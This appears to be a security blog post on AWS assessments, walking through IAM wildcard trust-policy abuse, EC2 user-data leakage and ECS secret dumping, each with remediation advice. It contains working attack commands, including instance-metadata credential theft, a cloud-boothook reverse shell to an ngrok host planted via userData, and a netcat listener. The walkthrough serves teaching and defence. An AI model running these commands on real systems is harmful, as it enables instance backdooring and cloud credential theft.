TL;DR: In a world of rapid digitization, companies are moving from traditional on-premise deployments to cloud service providers to host their infrastructure. In this article, we discuss a series of common misconfigurations in AWS services that lead to security vulnerabilities.
When it comes to cloud security, several types of maturity assessments can be performed before resources, applications, or services are deployed into a company’s production environment. It is therefore essential to understand what types of assessments can be done when using an Amazon Web Services (AWS) cloud environment. Three common assessment types are:
Cloud Security Threat Modeling: Identify and prevent major security threats before services or applications go into production. This can be done by performing a security design review, using a Product Requirements Document (PRD) diagram to map all the important data flows, and working through a security questionnaire with the product team. This assessment helps companies understand the attack surface and the vulnerabilities that could be present, or might arise, before going live.
Cloud Penetration Tests (Internal and External): Penetration tests aim to eliminate known application and network security vulnerabilities in the cloud environment. These tests also help the organization prevent sensitive data exposure.
Cloud Configuration Review: In this type of assessment, a company protects against configuration-related vulnerabilities that may lead to unauthorized access to secrets or protected resources, privilege escalation, and other methods of gaining access to the cloud environment.
AWS Security Assessments
It is important to understand the overall scope and the resources that are being deployed into the cloud. Before getting started with a security assessment, it is essential to focus on the following points:
- Scoping of AWS Resources
- Developing an Attack Surface
- Determining the Mission Critical Services
- Reconnaissance of AWS Assets
- Understanding Security Control and Monitoring of Assets
Scoping of AWS Resources
The scoping of resources is a critical first step before starting any cloud engagement. The main goal of this step is to outline the resources deployed in AWS, such as the number of services, Elastic Compute Cloud (EC2) instances, internal and external IPs, APIs, Virtual Private Cloud (VPC) assets, subnets, and Identity and Access Management (IAM) users and roles.
Try to gather as much documentation as possible around the mapping and PRD diagrams of the company’s infrastructure. We can also use IAM roles and a variety of open-source tools to enumerate, discover, and map out the resources and services present in AWS; a minimal inventory sketch using the AWS CLI follows below.
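As a starting point, here is a minimal inventory sketch using standard AWS CLI calls; the profile name `assessment` and the region are assumptions for illustration:

```bash
# Quick inventory of tagged resources in one region (returns ARNs):
aws resourcegroupstaggingapi get-resources --region us-east-1 --profile assessment

# Count the core resources that typically anchor the scope:
aws ec2 describe-instances --region us-east-1 --profile assessment \
  --query 'Reservations[].Instances[].InstanceId'
aws ec2 describe-vpcs --region us-east-1 --profile assessment --query 'Vpcs[].VpcId'
aws s3api list-buckets --profile assessment --query 'Buckets[].Name'
aws iam list-users --profile assessment --query 'Users[].UserName'
aws iam list-roles --profile assessment --query 'Roles[].RoleName'
```

Running these per region gives a rough count of in-scope assets that can then be cross-checked against the documentation gathered from the product team.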
Developing an Attack Surface
After the initial scoping phase, it is important to prepare an attack strategy for the engagement. This step is necessary to ensure that most test cases against the specific services and resources in AWS are covered before the assessment begins.
The end goal for this step is to ensure quality control, achieve full coverage of test cases, and account for more complex scenarios. For example, a complex test case might involve discovering how an attacker can leverage a misconfiguration in a service and escalate it into much more critical issues such as crypto mining, administrative access to the infrastructure, backdooring services (e.g., Lambda), or gaining unauthorized access to services.
Determining Mission Critical Services in AWS
During an AWS assessment, it is vital to understand the use cases of the different services and identify any associated concerns. Before starting the audit, the main goal should be to map the critical services such as EC2, Lambda, IAM, RDS, and S3, and to prioritize assessing and analyzing these core services for known misconfigurations or common vulnerabilities.
For example, here are some questions to ask yourself to map out what is a mission-critical service within AWS:
- Does the service contain some form of sensitive data?
- Does this service handle the authentication and authorization process?
- Are there any APIs associated with this service?
- Which service providers have delegated access to resources?
- Which services are storing secrets, and how do we handle them?
- What kind of services would be at risk of exposure if they were to contain known application security vulnerabilities?
Reconnaissance on AWS Assets
In this next step, you need to perform reconnaissance and enumerate all the public endpoints to find resources that might be exposed globally. This step also helps companies understand their public exposure and identify assets in terms of IPs, domains, S3 buckets, CloudFront distributions, Elastic Load Balancing (ELB) endpoints, public snapshots (e.g., Elastic Block Store (EBS) or database snapshots), and AWS account IDs that can be used for cross-account role enumeration. A few example checks are sketched below.
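As a hedged illustration, checks along these lines can be run with the CLI; the profile, region, and bucket name are assumptions:

```bash
# EBS snapshots owned by this account that are restorable by anyone (public):
aws ec2 describe-snapshots --owner-ids self --restorable-by-user-ids all \
  --region us-east-1 --profile assessment

# Instances paired with their public IP addresses (if any):
aws ec2 describe-instances --region us-east-1 --profile assessment \
  --query 'Reservations[].Instances[].[InstanceId,PublicIpAddress]'

# Whether a given bucket has Block Public Access configured:
aws s3api get-public-access-block --bucket example-bucket --profile assessment
```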
Understanding the Security Controls & Monitoring
This step covers how companies monitor, react to, and handle security incidents. It establishes a baseline for assessing whether all the necessary controls would be in place if an intrusion were to take place. Throughout this step, it’s important to check for the presence of the following security controls:
- CloudWatch – Used for monitoring and optimization of resources
- CloudTrail – Used for logging all API calls, which makes it possible to track malicious activity
- AWS Config – Used for checking compliance and tracking configuration changes for resources
- S3 Logging – Storing server access logs for S3 buckets
We want to ensure that the different solutions are properly managed and that they perform their respective security tasks accurately. This is important because these services are your front line of defense if anything gets compromised within an AWS environment.
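A quick presence check for these controls might look like the following sketch; the trail name, bucket name, and profile are placeholders:

```bash
# Is CloudTrail configured, and is the trail actually logging?
aws cloudtrail describe-trails --profile assessment
aws cloudtrail get-trail-status --name management-events --profile assessment

# Is the AWS Config recorder running?
aws configservice describe-configuration-recorder-status --profile assessment

# Does a given S3 bucket have server access logging enabled?
aws s3api get-bucket-logging --bucket example-bucket --profile assessment
```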
Identification of AWS Services
Now that we’ve covered an AWS security assessment at a high level, this section of the blog will dive into more detail about some of the common AWS core services, as well as provide insight into what kind of vulnerabilities can arise across these different services. The AWS core services we’ll cover are as follows:
- Identity and Access Management (IAM)
- API Gateway
- Lambda
- Elastic Compute Cloud (EC2)
Identity and Access Management (IAM)
The IAM service is used for managing and delegating access to resources through an access control mechanism expressed as JSON policies. If an attacker gains access to AWS access keys tied to an IAM identity, they can leverage multiple misconfigurations to escalate their privileges, change the password of the IAM account, or use existing IAM policies to reach sensitive information in S3 or in Lambda environment variables. Some of the more well-known vulnerabilities and misconfigurations within IAM are listed below, followed by a short review sketch:
- Misconfigured trust policies
- Cross-account role enumeration
- Overly permissive policies
- Dangerous policy combinations
- `iam:PassRole` abuse
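As that review sketch, a few standard CLI calls (the profile and user name are assumptions) dump the account’s IAM details for offline analysis:

```bash
# Dump users, groups, roles, and their policies in a single call:
aws iam get-account-authorization-details --profile assessment > iam-details.json

# Check who the current credentials belong to, then review their attached policies:
aws sts get-caller-identity --profile assessment
aws iam list-attached-user-policies --user-name test_user --profile assessment
```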
API Gateway
The API Gateway is a fully managed AWS service that integrates with different AWS services such as Lambda, Kinesis, and EC2. The API Gateway service is used to develop, publish, maintain, and manage RESTful and WebSocket APIs. Some of the common issues in API Gateway are listed below, with a quick authentication check sketched after the list:
- Lack of authentication on endpoints
- Misconfigured private API endpoints
- Denial of Service (DoS)
- Poorly implemented authorizer functions
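For the first item, lack of authentication, a quick check might look like this (the API and resource IDs are hypothetical):

```bash
# List the REST APIs in the account and note each API's "id":
aws apigateway get-rest-apis --profile assessment

# Walk the resources of one API, then inspect a method on a resource:
aws apigateway get-resources --rest-api-id a1b2c3d4e5 --profile assessment
aws apigateway get-method --rest-api-id a1b2c3d4e5 --resource-id abc123 \
  --http-method GET --profile assessment
# "authorizationType": "NONE" with "apiKeyRequired": false means anyone who
# can reach the endpoint can call the method.
```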
Lambda
The Lambda service allows you to run code without managing servers, handling compute, autoscaling, and capacity provisioning for you automatically. To run a Lambda function, you either call the Lambda API directly or let other AWS services and resources invoke the function. The common vulnerabilities in Lambda are listed below, followed by a short enumeration sketch:
- Common application security vulnerabilities such as Server-Side Request Forgery (SSRF), XML External Entity (XXE) attacks, deserialization, and command injection
- Insecure 3rd party dependencies
- Using Lambda as a backdoor
- Denial of Service (DoS) vectors, such as AWS VPC IP Deception or Financial Resource Exhaustion techniques
- Lambda alias routing
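As that sketch (the profile, region, and function name are assumptions), secrets frequently leak through function environment variables and deployment packages:

```bash
# List functions along with any environment variables they expose:
aws lambda list-functions --region us-east-1 --profile assessment \
  --query 'Functions[].[FunctionName,Environment.Variables]'

# Fetch a presigned URL for a function's deployment package to review its code:
aws lambda get-function --function-name example-function --profile assessment \
  --query 'Code.Location'
```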
Elastic Compute Cloud (EC2)
The EC2 service is used to deploy virtual server instances that run applications in the AWS cloud environment. Using EC2, it is possible to launch multiple servers or instances for deploying your resources. The common issues related to EC2 are listed below; a short metadata-service sketch follows the list:
- User data scripts that expose sensitive information such as SSH keys, AWS keys, secrets, or tokens
- Public Elastic Block Storage (EBS) snapshots
- Unencrypted EBS volumes and snapshots
- SSRF leading to metadata leakage
- Exploiting open ports and exposed services
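To illustrate the SSRF item, the sketch below shows what an attacker typically retrieves from the instance metadata service (IMDSv1) once they can make the instance issue HTTP requests on their behalf; the role name is a placeholder:

```bash
# List the IAM role attached to the instance, then pull its temporary credentials:
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/<role-name>

# IMDSv2 requires a session token first, which blunts many SSRF vectors:
TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" \
  -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -s -H "X-aws-ec2-metadata-token: $TOKEN" \
  http://169.254.169.254/latest/meta-data/
```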
Common AWS Misconfigurations
In this section, we’ll dive into three of the most common misconfiguration issues seen in AWS environments, covering each misconfiguration, an attack method, and the remediation efforts that can prevent these styles of attack. We’ll cover the following vulnerabilities:
- IAM misconfigured trust policy
- EC2 user data leakage leads to sensitive information disclosure
- Dumping hardcoded secrets from Elastic Container Service (ECS) task definition
IAM Misconfigured Trust Policy
To understand this vulnerability, we first need to understand the trust policy and its components. The trust policy is a JSON document that ensures that only allowed or “trusted” principals are able to assume the IAM role. For a user to assume the IAM role, they need to have `sts:AssumeRole` permissions attached to their IAM user account. From here, the user is able to perform all the necessary actions that are defined in the IAM JSON policy for that role.
Misconfigurations arise when the AWS `Principal` parameter is set to a wildcard (`"*"`), which allows any IAM entity to assume the role and perform the actions defined in the IAM role policy. This overly permissive misconfiguration lets any user assume the IAM role and, from there, escalate privileges to gain administrative access.
Vulnerable IAM Trust Policy
For example, below is an IAM trust policy with a wildcard set:
{ "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Principal": { "AWS": "*" }, "Action": "sts:AssumeRole", "Condition": {} } ] }
Exploitation of IAM Misconfigured Trust
To demonstrate how an attacker could abuse this wildcard and elevate privileges, let’s step through an attack scenario:
1. Using the AWS CLI, check the user account with the command `aws sts get-caller-identity --profile test_user`:
Figure 1: Identifying the user account in AWS CLI
2. Check the IAM trust policy for all the roles using the command `aws iam list-roles --profile test_user`:
Figure 2: Identifying all roles within the IAM trust policy
3. From this, we can see the role named `s3-production-access`, which has its AWS `Principal` set to `"*"`, as seen in the figure below:
Figure 3: AWS `Principal` set as a wildcard
4. From the IAM role policy, it’s possible to verify what privileges this role has by using the command `aws iam list-attached-role-policies --role-name s3-production-access --profile test_user`:
Figure 4: Verifying the privilege level
5. From here, we can see that after assuming this role, we can gain full access to the production S3 buckets. To assume this role, we use the Security Token Service (STS) with the following command:
`aws sts assume-role --role-arn "arn:aws:iam::290338565208:role/s3-production-access" --role-session-name attack --profile test_user`
6. Once we have configured the returned access key, secret access key, and session token as a new profile (`iam_attack`), we can verify that we have access to the role by using the following command:
`aws sts get-caller-identity --profile iam_attack`
This is verified in the figure below:
Figure 5: Verification of access to the assumed role
7. Now we can list and access the `production-secret-data` bucket and get the file’s contents by running the command `aws s3 ls --profile iam_attack`, as shown in Figure 6. From here, we can access the username and password of the account, as shown below:
Figure 6: Running the command to access the `production-secret-data` bucket
Figure 7: Access to the username and password
Remediation
To remediate this IAM trust policy misconfiguration, the use of a wildcard (`"*"`) in the `Principal` parameter must be restricted. Always ensure that only a valid IAM entity within the organization is allowed as the `Principal` to assume the role.
The right policy format would look something like this:
{ "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Principal": {“AWS": "arn:aws:iam::123456789012:authorized" }, "Action": "sts:AssumeRole", "Condition": { "Bool": { "aws:MultiFactorAuthPresent": "true" } } } ] }
This example is correctly configured because it has valid `Principal` and `Condition` parameters, ensuring no other IAM user can assume this role. The `Condition` also requires that the user presents Multi-Factor Authentication (MFA) for the role to be assumed.
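With this policy in place, assuming the role only succeeds when the caller supplies a valid MFA device serial and a current code, roughly as sketched below (the ARNs and token code are placeholders):

```bash
aws sts assume-role \
  --role-arn "arn:aws:iam::123456789012:role/s3-production-access" \
  --role-session-name mfa-session \
  --serial-number "arn:aws:iam::123456789012:mfa/authorized" \
  --token-code 123456 \
  --profile test_user
```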
EC2 User Data Leakage Leads to Sensitive Information Disclosure
EC2 user data makes it possible to run bash scripts while an instance boots. The script runs only during the boot process, but it runs with root privileges. Developers often use user data to automate tasks such as installing software, updating the instance, and setting environment variables.
When assessing an AWS environment, an attacker can view this user data, which may include AWS access keys, usernames, passwords, and environment variables. An attacker can use leaked AWS credentials to create multiple instances and add backdoors or shells to instances within the AWS infrastructure.
Exploitation of User Data in EC2
1. First, we need to identify all of the instances in the AWS account in a specified region using the command `aws ec2 describe-instances --profile test_account --region us-east-1`:
Figure 8: Identifying the AWS account’s `InstanceId` in a specified region
2. Using the `InstanceId` from Figure 8, we can retrieve the user data from the EC2 instance with the command `aws ec2 describe-instance-attribute --instance-id i-0cf93849d3d84f670 --attribute userData --profile test_account --region us-east-1`:
Figure 9: `userData` information retrieved, showing a base64-encoded string
3. From here, we can decode the base64 string to recover the username and password for the instance user, which were hardcoded in the `userData` script during the boot process:
Figure 10: Decoding the base64 data
4. Now that we have the username and password for this user, we can also turn this vulnerability into a reverse shell by tampering with the instance’s attributes.
To do so, we can run the following command: `aws ec2 modify-instance-attribute --instance-id [target instance] --attribute userData --value file://exploit.sh`
Exploit.sh:

```bash
#cloud-boothook
#!/bin/bash
bash -i >& /dev/tcp/6.tcp.ngrok.io/11404 0>&1
python -c 'import pty; pty.spawn("/bin/bash")'
```
In order for this to trigger, the victim user has to restart the instance, which will execute the script and give us a simple reverse shell in our terminal, as seen below:
Figure 11: Gaining a reverse shell
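For completeness, a minimal listener setup for catching the shell, assuming an ngrok TCP tunnel like the one used in `exploit.sh` (the local port is arbitrary):

```bash
# Terminal 1: expose a local port; ngrok prints the public host:port
# (e.g., 6.tcp.ngrok.io:11404) that the reverse shell connects back to.
ngrok tcp 4444

# Terminal 2: listen on that local port and wait for the shell:
nc -lvnp 4444
```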
Remediation
A number of best practices can be followed to remediate this kind of attack:
- Restrict the `ec2:ModifyInstanceAttribute` permission, and prevent development teams from hardcoding sensitive values such as environment variables, AWS access keys, and credentials in user data
- Apply the principle of least privilege to all roles assigned to users and instances.
- Implement proper egress controls to prevent reverse shells and the download of malicious payloads. This involves disabling all outbound communications by default in security groups (a sketch follows this list).
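A minimal sketch of that egress remediation (the security group ID is hypothetical): drop the default allow-all outbound rule, then explicitly allow only the traffic the workload needs:

```bash
# Remove the default "allow all outbound" rule:
aws ec2 revoke-security-group-egress --group-id sg-0123456789abcdef0 \
  --ip-permissions '[{"IpProtocol":"-1","IpRanges":[{"CidrIp":"0.0.0.0/0"}]}]'

# Re-allow only what is required, e.g., outbound HTTPS:
aws ec2 authorize-security-group-egress --group-id sg-0123456789abcdef0 \
  --ip-permissions '[{"IpProtocol":"tcp","FromPort":443,"ToPort":443,"IpRanges":[{"CidrIp":"0.0.0.0/0"}]}]'
```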
Dumping Hardcoded Secrets from ECS Tasks Definition
Elastic Container Service (ECS) is a managed AWS service that allows users to host containerized applications. ECS has two different launch types: Fargate and EC2. Before creating and deploying applications on ECS, we need to launch clusters. A cluster is a logical grouping of tasks or services, whereas the containers hold the actual application that is executed within the ECS cluster.
To run containers, we need to define a task definition, a JSON document containing the summary or blueprint of your application. A task is an instantiation of a task definition in a cluster. This vulnerability arises when, while creating a task definition, the development team adds sensitive information such as credentials and tokens as command-line arguments.
ECS Exploitation
1. Configure Pacu and add the necessary AWS credentials to the session:
Figure 12: Configuring Pacu and adding credentials
2. To enumerate tasks within the ECS cluster, run the command `exec ecs__enum`:
Figure 13: Enumerating tasks within the ECS cluster
3. After this step, we can dump all the task definitions using Pacu’s `ecs__enum_task_def` module:
Figure 14: Task definitions dumped into a folder
4. The task definitions have now been dumped into the given folder. Now we can view the contents of the task definitions and check for sensitive information in environment variables, such as MySQL credentials:
Figure 15: Checking the task definitions for sensitive information
Figure 16: Identified MySQL credentials hardcoded into task definitions
Remediation
To reduce the risk of exposing data to third parties, secrets should never be stored unencrypted in task definitions. All secrets should be encrypted at rest and in transit; better yet, store them in a dedicated service such as AWS Secrets Manager and reference them from the task definition, as sketched below.
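A minimal sketch of the safer pattern (the family, image, and ARNs are placeholders): store the secret in AWS Secrets Manager and reference it from the task definition via `secrets`, so it never appears in plaintext in the definition itself:

```bash
cat > taskdef.json <<'EOF'
{
  "family": "example-app",
  "executionRoleArn": "arn:aws:iam::123456789012:role/ecsTaskExecutionRole",
  "containerDefinitions": [
    {
      "name": "app",
      "image": "example/app:latest",
      "memory": 512,
      "secrets": [
        {
          "name": "MYSQL_PASSWORD",
          "valueFrom": "arn:aws:secretsmanager:us-east-1:123456789012:secret:prod/mysql-AbCdEf"
        }
      ]
    }
  ]
}
EOF
# The execution role must be allowed to call secretsmanager:GetSecretValue
# for the referenced secret.
aws ecs register-task-definition --cli-input-json file://taskdef.json --profile assessment
```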
Conclusion
In this blog, we have covered some of the vulnerabilities that can be found during an AWS security assessment, along with some solutions that help protect against these types of attacks when deploying applications in the cloud. It is important that organizations understand the threats they face and the preventative measures that should be taken when deploying any application. If these preventative processes are implemented during the design phase, it’s possible to significantly reduce the risks to the AWS environment.
For further reading, please see the AWS attack mindmap and further resources below:
AWS Attack Mind Map
Further Resources
- https://aws.amazon.com/security/
- https://rhinosecuritylabs.com/blog/
- https://application.security/free/kontra-aws-clould-top-10
- https://github.com/RhinoSecurityLabs/cloudgoat
- https://github.com/OWASP/DVSA
- Payloads_All_Things_AWS
- AWS Attacks Mind Map
Written by: Devansh Bordia
A cyber security consultant who enjoys breaking applications and was recognized as a Bugcrowd MVP in Q2 2020. He has found more than 200 vulnerabilities across various multinational organizations, has reported a slew of CVEs in open-source products, and holds technical certifications such as eCPPT, eWPTX, and AWS Solutions Architect.